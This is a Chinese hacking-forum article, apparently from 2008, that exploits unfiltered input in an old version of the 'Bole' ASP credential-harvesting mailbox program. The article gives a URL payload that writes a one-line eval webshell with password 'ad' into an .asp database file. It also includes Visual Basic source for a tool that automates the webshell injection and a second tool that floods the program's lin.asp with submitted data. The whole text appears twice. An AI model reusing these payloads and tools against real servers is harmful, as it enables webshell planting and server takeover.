伯樂asp收信程序漏洞及利用程序利用代碼
更新時(shí)間:2008年06月07日 22:16:02 作者:
信息來源:邪惡八進(jìn)制信息安全團(tuán)隊(duì)(www.eviloctal.com)
文章作者:fhod
發(fā)這個(gè)也是因?yàn)榭戳薬sm所寫的新概念收信程序 箱子永遠(yuǎn)不會(huì)被黑
http://forum.eviloctal.com/thread-32151-1-1.html
之后又有會(huì)員PM我..加上事過已久..也不是什么保密的東西了..網(wǎng)上也許到處都是了..就考慮把東西發(fā)出來..算是個(gè)學(xué)習(xí)吧..
伯樂的收信程序(針對(duì)以前的老版本.后來修補(bǔ)了這個(gè)漏洞)
主數(shù)據(jù)庫名第一次使用設(shè)置時(shí)是隨機(jī)產(chǎn)生的..但因?yàn)樗峭ㄓ檬招懦绦?.可以截獲密保..
mibao.asp文件對(duì)提交的參數(shù)沒有任何過濾
if action="put" then
sql="select * from mibao where u='"&request("u")&"'"
set rs=Server.CreateObject("ADODB.RecordSet")
rs.open sql,conn,1,3
if rs.eof then
rs.addnew
rs("u")=request("u")
rs("pos")=request("pos")
rs("p")="等待破解"
rs.update
rs.close
response.write "addok"
else
sql="update mibao set pos='"&request("pos")&"'"&" where u='"&request("u")&"'"
conn.execute(sql)
response.write "updateok"
end if
end if
第一行代碼處
ConnStr="Provider = Microsoft.Jet.OLEDB.4.0;Data Source =" & Server.MapPath("mibaoaa.asp")提交的數(shù)據(jù)插進(jìn)了mibaoaa.asp
asp后綴的數(shù)據(jù)庫文件..未做防下載處理..提交一句話木馬..很容易得到webshell
假設(shè)箱子地址是
http://127.0.0.1/
就訪問
http://127.0.0.1/mibao.asp?action=put&u=3&pos=3<%25eval request(%22%61%64%22) %25>&mb=3&p=3
返回 "addok"就說明插馬成功
接著
http://127.0.0.1/mibaoaa.asp訪問小馬..
密碼是ad.上傳大馬拿到webshell
根據(jù)此漏洞我用VB寫了一個(gè)簡(jiǎn)單的利用程序..
程序VB源碼
Private Sub Command1_Click()
Inet1.OpenURL (Text1.Text + "/mibao.asp?action=put&u=3&pos=3<%25eval request(%22%61%64%22) %25>&mb=3&p=3") '用inet連接網(wǎng)頁
aa = InStr(Inet1.GetHeader, "404") '判斷頁頭是否包含字符“404”,返回0則不包含,否則返回其位置
If aa <> 0 Then '頁頭中包含404
MsgBox "木馬插入失??!", 48, "失??!" '則說明該網(wǎng)頁不存在
Else '如果頁頭中不包含“404”
MsgBox "木馬插入成功!", 64, "恭喜!" '說明網(wǎng)頁存在
Command2.Enabled = True
End If
End Sub
Private Sub Command2_Click()
If Text2.Text = Text1.Text + "/mibaoaa.asp" Then
MsgBox "已經(jīng)存在!請(qǐng)不要重復(fù)此操作!", 16, "error!"
Else
Text2.Text = Text1.Text + "/mibaoaa.asp"
MsgBox "請(qǐng)使用一句話木馬客戶段連接!密碼ad!", 64, "成功!"
Text2.Visible = True
End If
End Sub
Private Sub Command3_Click()
End
End Sub
程序和動(dòng)畫演示我也一并打包上傳了..教程因?yàn)槭侨ツ曜龅牧?.里面一些信息請(qǐng)各位兄弟看后不要再去嘗試了..
教程里所寫的聯(lián)系QQ也不要再去加了..那時(shí)候因?yàn)榛炜陲埑?.賣了幾個(gè)程序..
現(xiàn)在全部都公開了.. BOLE.RAR (2.5 MB)
另外看到貼中有人提到刷信問題..lin.asp也是沒怎么過濾的..可以外部提交數(shù)據(jù)
VB刷信代碼
Private Sub Command1_Click()
Inet1.OpenURL (Text1.Text + "/lin.asp?a=" + Text2.Text + "&s=" + Text3.Text + "&u=" + Text4.Text + "&p=" + Text5.Text + "&r=" + Text7.Text + "&l=" + Text8.Text + "&m=" + Text9.Text + "&pin=" + Text6.Text) '用inet連接網(wǎng)頁
aa = InStr(Inet1.GetHeader, "404") '判斷頁頭是否包含字符“404”,返回0則不包含,否則返回其位置
If aa <> 0 Then '頁頭中包含404
MsgBox "刷信失?。∧J(rèn)收信頁面可能被改名!", 48, "失敗!" '則說明該網(wǎng)頁不存在
Else '如果頁頭中不包含“404”
MsgBox "刷信成功!請(qǐng)登陸后臺(tái)查看!", 64, "恭喜!" '說明網(wǎng)頁存在
End If
End Sub
Private Sub Command2_Click()
End
End Sub
之后又有會(huì)員PM我..加上事過已久..也不是什么保密的東西了..網(wǎng)上也許到處都是了..就考慮把東西發(fā)出來..算是個(gè)學(xué)習(xí)吧..
伯樂的收信程序(針對(duì)以前的老版本.后來修補(bǔ)了這個(gè)漏洞)
主數(shù)據(jù)庫名第一次使用設(shè)置時(shí)是隨機(jī)產(chǎn)生的..但因?yàn)樗峭ㄓ檬招懦绦?.可以截獲密保..
mibao.asp文件對(duì)提交的參數(shù)沒有任何過濾
復(fù)制代碼 代碼如下:
if action="put" then
sql="select * from mibao where u='"&request("u")&"'"
set rs=Server.CreateObject("ADODB.RecordSet")
rs.open sql,conn,1,3
if rs.eof then
rs.addnew
rs("u")=request("u")
rs("pos")=request("pos")
rs("p")="等待破解"
rs.update
rs.close
response.write "addok"
else
sql="update mibao set pos='"&request("pos")&"'"&" where u='"&request("u")&"'"
conn.execute(sql)
response.write "updateok"
end if
end if
第一行代碼處
ConnStr="Provider = Microsoft.Jet.OLEDB.4.0;Data Source =" & Server.MapPath("mibaoaa.asp")提交的數(shù)據(jù)插進(jìn)了mibaoaa.asp
asp后綴的數(shù)據(jù)庫文件..未做防下載處理..提交一句話木馬..很容易得到webshell
假設(shè)箱子地址是
http://127.0.0.1/
就訪問
http://127.0.0.1/mibao.asp?action=put&u=3&pos=3<%25eval request(%22%61%64%22) %25>&mb=3&p=3
返回 "addok"就說明插馬成功
接著
http://127.0.0.1/mibaoaa.asp訪問小馬..
密碼是ad.上傳大馬拿到webshell
根據(jù)此漏洞我用VB寫了一個(gè)簡(jiǎn)單的利用程序..
程序VB源碼
復(fù)制代碼 代碼如下:
Private Sub Command1_Click()
Inet1.OpenURL (Text1.Text + "/mibao.asp?action=put&u=3&pos=3<%25eval request(%22%61%64%22) %25>&mb=3&p=3") '用inet連接網(wǎng)頁
aa = InStr(Inet1.GetHeader, "404") '判斷頁頭是否包含字符“404”,返回0則不包含,否則返回其位置
If aa <> 0 Then '頁頭中包含404
MsgBox "木馬插入失??!", 48, "失??!" '則說明該網(wǎng)頁不存在
Else '如果頁頭中不包含“404”
MsgBox "木馬插入成功!", 64, "恭喜!" '說明網(wǎng)頁存在
Command2.Enabled = True
End If
End Sub
Private Sub Command2_Click()
If Text2.Text = Text1.Text + "/mibaoaa.asp" Then
MsgBox "已經(jīng)存在!請(qǐng)不要重復(fù)此操作!", 16, "error!"
Else
Text2.Text = Text1.Text + "/mibaoaa.asp"
MsgBox "請(qǐng)使用一句話木馬客戶段連接!密碼ad!", 64, "成功!"
Text2.Visible = True
End If
End Sub
Private Sub Command3_Click()
End
End Sub
程序和動(dòng)畫演示我也一并打包上傳了..教程因?yàn)槭侨ツ曜龅牧?.里面一些信息請(qǐng)各位兄弟看后不要再去嘗試了..
教程里所寫的聯(lián)系QQ也不要再去加了..那時(shí)候因?yàn)榛炜陲埑?.賣了幾個(gè)程序..
現(xiàn)在全部都公開了.. BOLE.RAR (2.5 MB)
另外看到貼中有人提到刷信問題..lin.asp也是沒怎么過濾的..可以外部提交數(shù)據(jù)
VB刷信代碼
復(fù)制代碼 代碼如下:
Private Sub Command1_Click()
Inet1.OpenURL (Text1.Text + "/lin.asp?a=" + Text2.Text + "&s=" + Text3.Text + "&u=" + Text4.Text + "&p=" + Text5.Text + "&r=" + Text7.Text + "&l=" + Text8.Text + "&m=" + Text9.Text + "&pin=" + Text6.Text) '用inet連接網(wǎng)頁
aa = InStr(Inet1.GetHeader, "404") '判斷頁頭是否包含字符“404”,返回0則不包含,否則返回其位置
If aa <> 0 Then '頁頭中包含404
MsgBox "刷信失?。∧J(rèn)收信頁面可能被改名!", 48, "失敗!" '則說明該網(wǎng)頁不存在
Else '如果頁頭中不包含“404”
MsgBox "刷信成功!請(qǐng)登陸后臺(tái)查看!", 64, "恭喜!" '說明網(wǎng)頁存在
End If
End Sub
Private Sub Command2_Click()
End
End Sub
相關(guān)文章
揭露88red生成htm靜態(tài)頁面企業(yè)建站系統(tǒng)漏洞
88red生成htm靜態(tài)頁面企業(yè)建站系統(tǒng)后門利用代碼,用88red做企業(yè)占的朋友可要注意了2008-05-05視窗操作系統(tǒng)密碼體系的弱點(diǎn)及對(duì)策(圖)
視窗操作系統(tǒng)密碼體系的弱點(diǎn)及對(duì)策(圖)...2007-01-01